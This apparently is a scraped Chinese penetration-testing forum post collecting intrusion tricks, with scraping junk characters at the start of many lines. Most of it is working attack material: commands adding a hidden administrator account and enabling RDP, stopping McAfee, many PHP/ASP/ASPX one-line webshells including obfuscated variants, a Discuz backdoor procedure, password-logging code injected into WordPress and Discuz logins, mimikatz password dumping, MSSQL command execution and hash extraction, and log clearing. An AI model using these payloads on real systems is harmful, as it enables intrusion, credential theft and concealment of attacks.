& f& l- N& @1 Q: Q5 z+ j6 q/v:<server[:port]> -- 指定要连接到的终端服务器。
' ~' {' O9 Y+ ~% w( i
/console -- 连接到服务器的控制台会话。
! ]6 P5 n  k$ a% K2 Y
, g  N. r: A( E! [& d/f -- 以全屏模式启动客户端。
) V5 g0 t- A- h9 l) e+ a' J) O
/w:<width> --  指定远程桌面屏幕的宽度。
+ f0 g' b& w' A) ]" U# a, p4 j+ C
$ p9 d: q* N- j! F, [* U/h:<height> -- 指定远程桌面屏幕的高度。
1 B8 g( X% ~" m6 T/ |9 G
- r8 @9 O4 U* y( K0 Q- G/edit -- 打开指定的 .rdp 文件来编辑。

) V! c8 F4 f" y$ n# Y0 m2 `/migrate -- 将客户端连接管理器创建的旧版
连接文件迁移到新的 .rdp 连接文件。


其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量

命令行下开启3389
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
; o* n. f" |( U) m0 z# nnet localgroup "Remote Desktop Users" asp.net /add
3 K3 q8 y, H# \+ ]( }4 zattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
( D7 V6 I# w1 [% k; f' Necho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
. T2 @) C; m/ Y% ?echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
$ H  g8 C. q6 q, W% inet start rasman
/ V& b* G% t$ ~7 znet start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
# ^# Q, ^, M* P# x* L3 p2 baction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
$ E" ~1 z& r3 F<input type="file" name="NewFile" size="50"><br>
! m6 M8 w' F8 }2 x/ G<input id="btnUpload" type="submit" value="Upload">
</form>
. {* \+ u' d/ h# B
) u1 S- s1 Z4 U2 w% gcontrol userpasswords2 查看用户的密码
access数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

测试2：

1 ~% s% ]& |3 @! J& J0 b6 lcreate table dirs(paths varchar(100),paths1 varchar(100), id int)

* s& Q6 A4 w# C! udelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

* j) l( J& n0 F  _0 i' @* ~  ]SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
2 k0 R: Y. V$ c# l7 j可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
net stop mcafeeframework
0 [: g9 J3 M( V+ O- H2 Y1 ]# G2 \: i; L; Snet stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
3 Y3 s7 x: R; L! x1 L4 I
  VNCDump.zip (4.76 KB, 下载次数: 1)
密码在线破解http://tools88.com/safe/vnc.php
& s2 w8 W; |: u+ E; A* S8 fVNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取

exec master..xp_cmdshell 'net user'
/ R1 _" ~; f; \8 N: bmssql执行命令。
获取mssql的密码hash查询
3 J2 _" t* V) d" S' k) Dselect name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
1 _4 n% Y4 D8 z& j5 Pbackup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
: y' i) y" [5 V. X6 ~/ p+ a0 i5 smssql数据库压缩

- q+ t0 f6 Q' I+ T' a2 Y6 |7 M2 tRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
1 ]/ V/ y* x$ B/ N( |( m将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak
5 E* P! X' R8 k! y7 W. ~% ~6 d( Z
Discuz！nt35渗透要点：
( l2 M1 h6 `5 B（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
" u  K) }1 p8 p4 |3 T/ c/ m6 U（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
; c1 \; R% i; r# ~; R* B（3）保存。
（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
0 M  y5 J  W* {- B* B+ _7 v' x3 t9 bd:\rar.exe a -r d:\1.rar d:\website\
' X7 \$ M! Q! @* _7 f8 Y) D递归压缩website
5 h* C+ O2 R) q注意rar.exe的路径
, r: I. R- i: v0 B6 i2 `
; j4 o# `% C% |3 o: \, Q<?php

. j2 C0 {% ?2 S: \. k4 G$telok   = "0${@eval($_POST[xxoo])}";
2 h7 i6 D7 G# c' \' E6 d
- \. R" v+ R6 p' w$username   = "123456";
2 Z6 v# d6 D# G) D. V% |
) T! g8 J0 B1 B$userpwd   = "123456";
/ H' G6 T3 X- `" \6 J
, \3 X- z; s! k# Q: L$telhao   = "123456";
+ k5 ?6 B/ \9 Y8 z9 }3 b' _
7 U8 P, N1 @& L. k$telinfo   = "123456";

?>
php一句话未过滤插入一句话木马
( a# |5 {+ Y* ~7 x+ M& u: Z
站库分离脱裤技巧
  r% i6 J- Q& i9 Eexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
2 \  p, O, r* o' Y" F/ nexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
4 d  {9 D% S5 e" K3 I这儿利用的是马儿的专家模式（自己写代码）。
9 ?- l% q' w4 A" K' T: v& c) Sini_set('display_errors', 1);
9 f+ K2 B1 e0 w. }% Yset_time_limit(0);
error_reporting(E_ALL);
, `9 d& k  F" y& l- j& O3 v$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
; z9 x3 j5 f0 C& ^% g$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
0 P) z7 w7 Y; L2 v8 v9 B$i = 0;
$tmp = '';
4 j: [3 Z- I4 U6 Y" F& Fwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
- j3 N& b. {0 s2 d+ d& I    $tmp .=  implode("::", $row)."\n";
    if(!($i%500)){//500条写入一个文件
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
8 |: T- N+ R5 p! p0 z2 o    }
" r9 w2 J7 h: F6 v; K}
mysql_free_result($result);



//down完后delete


% M2 E2 c' X8 B9 t  f8 S6 {6 o  {ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
0 r! R: k6 f. U& A) @- V/ jwhile($i<32) {
    $i = $i+1;
* e* M0 _4 C1 y, I# p# J        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
6 P* }* M/ R1 b, u. K. t; a, s        unlink($filename);
9 @" j8 a. b, n8 {: r7 m8 Z}
httprint 收集操作系统指纹
" B0 `6 ]% n: [扫描192.168.1.100的所有端口
nmap –PN –sT –sV –p0-65535 192.168.1.100
. J. l4 y4 D  G4 i0 u0 F, k  shost -t ns www.owasp.org 识别的名称服务器，获取dns信息
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
Netcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host
; [5 U7 X8 G8 c' k2 B, G
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)

　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)
# O1 K, `  T3 k- h" C( @  k
5 ~5 ]- H* Z( O　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x
9 o. ~2 n1 g! ^9 A' e# i" N& _
　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)

　　http://net-square.com/msnpawn/index.shtml (要求安装)

　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)

　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
set names gb2312
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
" w% q) x6 \4 Z! r0 p- F
' \7 [% `& w# q4 m& k6 G% J3 R! Cmysql 密码修改
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
4 w8 L/ s5 T7 Y1 u, r5 o高级的PHP一句话木马后门
( ^7 R5 {4 {' \" Q5 |
) u: u3 E1 M' r1 Q6 ^& O& h入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀

1、
" \! [0 [" Y  ~' T+ L# m
5 [% n$ V2 i* v: k$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; \  h' H9 L5 |
$hh("/[discuz]/e",$_POST['h'],"Access");
+ \. Y) l" s: L% j& B, }- d
//菜刀一句话
1 N; w4 p6 a' r
2、

* ~* U( m& y9 B- Y' U5 t$filename=$_GET['xbid'];
% l- I# k7 F) m# v8 f! w4 a* ~
include ($filename);
0 D8 M9 q: i9 W
//危险的include函数，直接编译任何文件为php格式运行

3、

0 A* e4 _( T: c9 [$reg="c"."o"."p"."y";
( Z! ~5 a' B! P* Z8 \
) X. F$ o2 `' o! W; t7 I$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

: g/ p  e3 Y0 l4、
! j/ f8 H; |) B8 h
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
  i4 q' A- f5 H1 F: b8 o
$gzid("/[discuz]/e",$_POST['h'],"Access");

7 t( m- c, D) N4 d8 P: E//菜刀一句话
, S0 j* u- N/ A
5、include ($uid);
5 Y, A* r4 j1 V4 J( G7 C
//危险的include函数，直接编译任何文件为php格式运行，POST


) |1 Y7 \; a+ v$ Z2 Q7 U. Z//gif插一句话

6、典型一句话
5 u2 E! T7 E3 o% h
% o) Q3 {* W7 \; R2 b/ z程序后门代码
  B8 d3 ^* B4 S: w8 [- C<?php eval_r($_POST[sb])?>
' j8 @9 ]# l! Y( H7 t程序代码
* E- G6 e8 G. k. _<?php @eval_r($_POST[sb])?>
0 L; k9 ]* M- V% h//容错代码
程序代码
<?php assert($_POST[sb]);?>
+ r- g$ b2 l2 j! e4 e//使用lanker一句话客户端的专家模式执行相关的php语句
' v. m, o0 D( m) j( ?程序代码
<?$_POST['sa']($_POST['sb']);?>
7 N7 Q- a0 [- u1 N' W) }! B程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
4 u" L8 Z6 v7 \?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
0 ^1 m, O/ m8 G  f2 l3 u程序代码
$ a2 R5 l. A, Z6 p! }<O>h=@eval_r($_POST[c]);</O>
7 W8 l1 g+ b  E, ~1 D3 `8 y( L程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话

9 @4 J; G% k- r% w$ K* g. nhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
详细用法：
1、到tools目录。psexec \\127.0.0.1 cmd
2、执行mimikatz
3、执行 privilege::debug
4、执行 inject::process lsass.exe sekurlsa.dll
" x: K- a6 k- A1 |! Z5、执行@getLogonPasswords
6、widget就是密码
7、exit退出，不要直接关闭否则系统会崩溃。
; v1 M6 ~+ D9 W6 F: j
& `0 U) b7 L  _, _! }& o6 T. Bhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面

8 V8 A4 W4 K8 j* T$ H/ K8 y自动查找系统高危补丁
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

$ k0 E1 n+ u+ l( C+ N/ d突破安全狗的一句话aspx后门
0 M0 F3 X+ O+ v8 B<%@ Page Language="C#" ValidateRequest="false" %>
, L/ h  x( w% A4 C; U- y<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
3 v: K$ R9 O, t& owebshell下记录WordPress登陆密码
  K+ u; ]' V  B, L- D: Bwebshell下记录Wordpress登陆密码方便进一步社工
在文件wp-login.php中539行处添加：
// log password
/ V' U6 q* t, z9 ?: X$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
- E; w3 R; Z1 z0 _9 Y( o  m$log_ip=$_SERVER["REMOTE_ADDR"];
- `1 w7 K: W6 _  a5 s4 N- g* y$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
2 H% ?% q" I* x& H$txt=$txt.”\r\n”;
( Z% l8 h- x( Z4 U8 u) @1 rif($log_user&&$log_pwd&&$log_ip){
: {: |4 u7 m3 n6 s/ {2 T0 @- D' \@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
. a& b% L" h4 `8 [6 }- {; v  l}
当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
" G' ^' }8 d/ n# j9 {8 ]4 `0 c就是搜索case ‘login’
在它下面直接插入即可，记录的密码生成在pwd.txt中，
其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
# G4 J! b, z2 E# _( X利用II6文件解析漏洞绕过安全狗代码：
4 Z5 B2 o1 r6 v7 v& q;antian365.asp;antian365.jpg

各种类型数据库抓HASH破解最高权限密码！
' W2 N# |  f6 }  ^* `8 _1.sql server2000
2 [* ]' b- q6 _3 {SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
4 {% A! H( c9 G0 P% i2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
( \/ a* M( x6 A, h' l# Y& L# \
7 ?  V$ R; m4 N$ K- M0×0100- constant header
! B$ i% }/ b- a34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
: G+ \7 d. ]0 H  Z) M2 S7 F993BF231-salt
/ y$ }* t+ |  w  w4 e5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

* d% h3 D, Z2 G3 r9 ]/ o0 t2 v1 I# tupdate:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
1 h8 `0 _6 i1 Ae.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
) h0 d+ e/ @* Y3 _) e' J" F3 N
  B- ?8 z* Y$ c" L. G# G3 I9 ~MYSQL:-

* H  r+ @* Y5 S2 u/ X6 q/ p7 J: ZIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
% j$ r* h) s' q6 L# ^. y
*mysql  < 4.1
- T% H# Z/ B0 I; Y
# x, J4 T2 _7 }# Omysql> SELECT PASSWORD(‘mypass’);
+——————–+
; U2 R" j& d- C3 q4 m8 W" a9 @: j| PASSWORD(‘mypass’) |
+——————–+
, A- }7 [* _! z| 6f8c114b58f2ce9e   |
+ O% v8 A- Z3 U5 {4 T9 B+——————–+

. q4 n) |2 m) o! z" h*mysql >=4.1

mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
| PASSWORD(‘mypass’)                        |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+ ~  S2 [. ]9 T3 |, x. Q8 ^+——————————————-+
8 {/ I. C0 ^! F
Select user, password from mysql.user
7 |/ O2 _- F4 P8 S1 I: P2 pThe hashes can be cracked in ‘cain and abel’

& L! h: R1 l; ~  d& z3 E" uPostgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
# W, K" q: a$ N9 Fselect usename, passwd from pg_shadow;
7 l# ~3 L* {: `usename      |  passwd
——————+————————————-
7 H/ C8 v: s5 K( x" I. l# l) T* Dtestuser            | md5fabb6d7172aadfda4753bf0507ed4396
+ n7 c- Z3 u+ b6 o: R/ d6 }use mdcrack to crack these hashes:-
2 L, ?; a! h+ V1 ?! V0 {: d% H) S$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
1 I$ F4 g6 D  C; O+ X( J3 m& ]
# l2 y/ @/ s  B# V. T* mOracle:-
select name, password, spare4 from sys.user$
$ C4 u0 S, B2 ^' d7 J0 U( ~$ F3 shashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….
+ [; E; V' Z( h" ^7 R9 J& q
( S1 R3 J+ b. s7 Q* g$ T! E% k9 F
在sql server2005/2008中开启xp_cmdshell
& x; s( r* d  e  b) z-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
& a+ {; I' O6 W3 j' H4 W; s5 I! P% CGO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
1 j; ]8 a0 C) _& q9 h1 S7 h-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
4 E( C, w9 E* ^' k$ l& V' PGO
4 q8 a2 z6 g( r8 M/ K0 e' n- L; ^-- To update the currently configured value for this feature.
RECONFIGURE
# d* ~" t# {8 g9 R5 ^! D7 mGO
# X5 s8 \6 M$ n8 v/ G3 A. iSQL 2008 server日志清除，在清楚前一定要备份。
如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
Ｘ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
1 {: W1 ~6 D. ^4 t
5 b7 r8 ?7 u3 p+ m2 e$ c对于SQL Server 2008以前的版本：
SQL Server 2005:
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
2 t) I) H- h$ N: ~; c9 SSQL Server 2000:
' B, g, o, H' E  z  L清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。

+ `7 U2 L+ Z& I+ m+ o6 j" K( o% |本帖最后由 simeon 于 2013-1-3 09:51 编辑

& ~4 d) M1 |! r% I* S
windows 2008 文件权限修改
0 j; X& w- G2 P$ B6 A1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
* S0 h( k% q& K2 F2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
* n! ~& b" S  {% P5 L- u一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，
7 T2 A) q+ n! g( @( _9 y: B" c
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
* }4 |; C6 Y# m- A/ F# {3 }@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
1 `1 c7 z2 H8 F. Q3 v"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
( f" T& _& X" r8 ^, K( ?( Q@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
  q* P5 ^0 ^- o# m& A8 n+ [# G
7 |% W( D/ J( k$ p$ p[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
( }0 I0 @1 h) w. y" Q' p2 j: h; N"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
8 ~! x6 I: S2 M1 _@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 l" F2 H1 U: q) _) B"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"


win7右键“管理员取得所有权”.reg导入
5 U" o1 S4 l! q9 Z" J二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
* v2 r" y& J/ M, @5 ^( o1、C:\Windows这个路径的“notepad.exe”不需要替换
9 E) W  k2 S- l2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
( f; D  o& p; d! E# C7 s3、四个“notepad.exe.mui”不要管
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: S" [! T" @  b4 nC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
- C& g2 ^4 @/ W替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
  W: I: _1 t: Y替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
windows 2008中关闭安全策略：
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
: i3 Q5 o( k  I( c$ \2 B( q你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
: M) R: o+ P. ]: H& Iif(getenv('HTTP_CLIENT_IP')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
% N0 Z# u* o! I5 e: ~9 a: i$onlineip = getenv('REMOTE_ADDR');
9 g; K, R& V% K  A8 t} else {
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
8 x: B# Q8 h! `! J) k) e$ S}
     $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
5 K1 M0 f# s9 s7 D3 u" }  q    $handle=fopen('./data/cache/csslog.php','a+');
    $write=fwrite($handle,$record);

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2